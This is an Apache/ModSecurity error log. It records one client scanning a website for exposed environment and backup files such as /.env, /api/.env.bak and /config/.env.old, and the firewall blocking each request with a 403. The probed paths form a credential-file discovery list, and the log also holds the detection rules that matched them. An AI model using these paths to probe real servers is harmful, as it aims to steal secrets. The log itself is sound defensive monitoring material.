[Sun Nov 16 06:04:52.918449 2025] [:error] [pid 105733] [client 13.62.46.112:40188] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/src/.env.old"] [unique_id "aRlbdAm3iQ6of_5tM-vZFAAAAAY"]
[Sun Nov 16 06:04:52.918527 2025] [:error] [pid 105706] [client 13.62.46.112:40160] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env.old"] [unique_id "aRlbdPgkUVuXhjEnxphnSgAAAAQ"]
[Sun Nov 16 06:04:52.918680 2025] [:error] [pid 105733] [client 13.62.46.112:40188] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/src/.env.old"] [unique_id "aRlbdAm3iQ6of_5tM-vZFAAAAAY"]
[Sun Nov 16 06:04:52.918716 2025] [:error] [pid 105706] [client 13.62.46.112:40160] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env.old"] [unique_id "aRlbdPgkUVuXhjEnxphnSgAAAAQ"]
[Sun Nov 16 06:04:52.918863 2025] [:error] [pid 105706] [client 13.62.46.112:40160] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env.old"] [unique_id "aRlbdPgkUVuXhjEnxphnSgAAAAQ"]
[Sun Nov 16 06:04:52.918935 2025] [:error] [pid 105733] [client 13.62.46.112:40188] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/src/.env.old"] [unique_id "aRlbdAm3iQ6of_5tM-vZFAAAAAY"]
[Sun Nov 16 06:04:52.919159 2025] [:error] [pid 105733] [client 13.62.46.112:40188] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/src/.env.old"] [unique_id "aRlbdAm3iQ6of_5tM-vZFAAAAAY"]
[Sun Nov 16 06:04:52.964419 2025] [:error] [pid 105715] [client 13.62.46.112:40220] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aRlbdDHqqjYXoy22w5Lv8QAAAAE"]
[Sun Nov 16 06:04:52.964722 2025] [:error] [pid 105715] [client 13.62.46.112:40220] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aRlbdDHqqjYXoy22w5Lv8QAAAAE"]
[Sun Nov 16 06:04:52.964941 2025] [:error] [pid 105715] [client 13.62.46.112:40220] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aRlbdDHqqjYXoy22w5Lv8QAAAAE"]
[Sun Nov 16 06:04:52.973525 2025] [:error] [pid 103446] [client 13.62.46.112:40136] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env.save"] [unique_id "aRlbdE-c4YqyOTFJOSeIWgAAAAk"]
[Sun Nov 16 06:04:52.973887 2025] [:error] [pid 103446] [client 13.62.46.112:40136] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env.save"] [unique_id "aRlbdE-c4YqyOTFJOSeIWgAAAAk"]
[Sun Nov 16 06:04:52.974108 2025] [:error] [pid 103446] [client 13.62.46.112:40136] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env.save"] [unique_id "aRlbdE-c4YqyOTFJOSeIWgAAAAk"]
[Sun Nov 16 06:04:53.034894 2025] [:error] [pid 103401] [client 13.62.46.112:40254] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aRlbdb5rejGDIGJeuSGFzgAAAAM"]
[Sun Nov 16 06:04:53.035101 2025] [:error] [pid 103401] [client 13.62.46.112:40254] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aRlbdb5rejGDIGJeuSGFzgAAAAM"]
[Sun Nov 16 06:04:53.035257 2025] [:error] [pid 103401] [client 13.62.46.112:40254] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aRlbdb5rejGDIGJeuSGFzgAAAAM"]
[Sun Nov 16 06:04:53.044391 2025] [:error] [pid 106191] [client 13.62.46.112:40180] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env.bak"] [unique_id "aRlbdZ9TX0jrupNVR0KhPQAAAAI"]
[Sun Nov 16 06:04:53.044620 2025] [:error] [pid 106191] [client 13.62.46.112:40180] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env.bak"] [unique_id "aRlbdZ9TX0jrupNVR0KhPQAAAAI"]
[Sun Nov 16 06:04:53.044951 2025] [:error] [pid 106191] [client 13.62.46.112:40180] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env.bak"] [unique_id "aRlbdZ9TX0jrupNVR0KhPQAAAAI"]
[Sun Nov 16 06:04:53.045216 2025] [:error] [pid 106191] [client 13.62.46.112:40180] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env.bak"] [unique_id "aRlbdZ9TX0jrupNVR0KhPQAAAAI"]
[Sun Nov 16 06:04:53.072631 2025] [:error] [pid 105760] [client 13.62.46.112:40174] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/.env.save"] [unique_id "aRlbdSX-V6YaRQK52Hc2AAAAAAU"]
[Sun Nov 16 06:04:53.072970 2025] [:error] [pid 105760] [client 13.62.46.112:40174] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/.env.save"] [unique_id "aRlbdSX-V6YaRQK52Hc2AAAAAAU"]
[Sun Nov 16 06:04:53.073247 2025] [:error] [pid 105760] [client 13.62.46.112:40174] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/.env.save"] [unique_id "aRlbdSX-V6YaRQK52Hc2AAAAAAU"]
[Sun Nov 16 06:04:53.181027 2025] [authz_core:error] [pid 103398] [client 13.62.46.112:40192] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env.old
[Sun Nov 16 06:04:53.195560 2025] [:error] [pid 106193] [client 13.62.46.112:40274] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/api/.env.bak"] [unique_id "aRlbdRmZz13emZeNiG2t9QAAAAg"]
[Sun Nov 16 06:04:53.195737 2025] [:error] [pid 106193] [client 13.62.46.112:40274] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env.bak"] [unique_id "aRlbdRmZz13emZeNiG2t9QAAAAg"]
[Sun Nov 16 06:04:53.195962 2025] [:error] [pid 106193] [client 13.62.46.112:40274] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env.bak"] [unique_id "aRlbdRmZz13emZeNiG2t9QAAAAg"]
[Sun Nov 16 06:04:53.196158 2025] [:error] [pid 106193] [client 13.62.46.112:40274] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env.bak"] [unique_id "aRlbdRmZz13emZeNiG2t9QAAAAg"]
[Sun Nov 16 06:04:53.227465 2025] [:error] [pid 105733] [client 13.62.46.112:40216] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/src/.env.save"] [unique_id "aRlbdQm3iQ6of_5tM-vZFQAAAAY"]
[Sun Nov 16 06:04:53.227653 2025] [:error] [pid 105733] [client 13.62.46.112:40216] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/src/.env.save"] [unique_id "aRlbdQm3iQ6of_5tM-vZFQAAAAY"]
[Sun Nov 16 06:04:53.227806 2025] [:error] [pid 105733] [client 13.62.46.112:40216] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/src/.env.save"] [unique_id "aRlbdQm3iQ6of_5tM-vZFQAAAAY"]
[Sun Nov 16 06:04:53.233804 2025] [:error] [pid 105761] [client 13.62.46.112:40260] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/config/.env.old"] [unique_id "aRlbdRajcO0QlxhJbyzqWQAAAAo"]
[Sun Nov 16 06:04:53.233988 2025] [:error] [pid 105761] [client 13.62.46.112:40260] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/.env.old"] [unique_id "aRlbdRajcO0QlxhJbyzqWQAAAAo"]
[Sun Nov 16 06:04:53.234201 2025] [:error] [pid 105761] [client 13.62.46.112:40260] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/.env.old"] [unique_id "aRlbdRajcO0QlxhJbyzqWQAAAAo"]
[Sun Nov 16 06:04:53.234387 2025] [:error] [pid 105761] [client 13.62.46.112:40260] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/.env.old"] [unique_id "aRlbdRajcO0QlxhJbyzqWQAAAAo"]
[Sun Nov 16 06:04:53.235561 2025] [:error] [pid 103401] [client 13.62.46.112:40290] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.dist"] [unique_id "aRlbdb5rejGDIGJeuSGFzwAAAAM"]
[Sun Nov 16 06:04:53.235729 2025] [:error] [pid 103401] [client 13.62.46.112:40290] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.dist"] [unique_id "aRlbdb5rejGDIGJeuSGFzwAAAAM"]
[Sun Nov 16 06:04:53.235918 2025] [:error] [pid 103401] [client 13.62.46.112:40290] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.dist"] [unique_id "aRlbdb5rejGDIGJeuSGFzwAAAAM"]
